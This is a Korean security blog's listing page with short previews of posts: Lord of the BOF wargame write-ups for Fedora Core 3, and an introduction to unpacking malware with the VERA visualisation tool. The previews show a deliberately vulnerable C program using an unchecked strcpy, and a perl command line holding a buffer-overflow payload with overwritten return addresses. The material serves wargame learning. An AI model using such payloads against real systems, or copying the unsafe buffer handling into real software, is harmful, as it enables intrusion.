LOB FC3 [iron_golem -> dark_eyes] [iron_golem@Fedora_1stFloor ~]$ cat dark_eyes.c/* The Lord of the BOF : The Fellowship of the BOF - dark_eyes - Local BOF on Fedora Core 3 - hint : RET sleding*/ int main(int argc, char *argv[]){ char buffer[256]; char saved_sfp[4]; if(argc < 2){ printf("argv error\n"); exit(0); } // save sfp memcpy(saved_sfp, buffer+264, 4); // overflow!! strcpy(buffer, argv[1]); // restore sfp memcpy(buffer+26.. 더보기 LOB FC3 [gate -> iron_golem] 를 풀다가 생긴 의문점에 대한 분석 1.왜 execve 대신 system을 사용하면 공격이 되지 않을까? [gate@Fedora_1stFloor ~]$ ./iron_golem `perl -e 'print "a"x268,"\x41\x84\x04\x08"x3,"\xc0\x07\x75\x00"'`aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.. 더보기 Vera를 이용한 Visual unpacking 소개-------프로그램 시각화 분석도구인 VERA를 이용한 visual unpacking 참고-------http://sinun.tistory.com/154 해킹의 비밀을 푸는 key 15 - p.234 개요-------대부분의 악성코드들이 packing된 형태로 배포되고 있으며, 이를 분석해야 하는 리버서들은 얼마나 빠르게 OEP를 찾아내느냐가 악성코드 분석의 분석시간을 좌우할것이다.Unpacking에는 수많은 노하우가 존재한다.내가 여기서 소개할 것은 VERA라는 프로그램 시각화 도구를 이용한, Unpacking방법에 대해서 소개할 것이다. 상세내용------VERA는 시각화 분석도구로써, 컴파일된 코드의 흐름을 시각화 시켜주는 유용한 도구이다. [+]VERA 다운로드 링크 http://csr.la.. 더보기 이전 1 ··· 48 49 50 51 52 다음
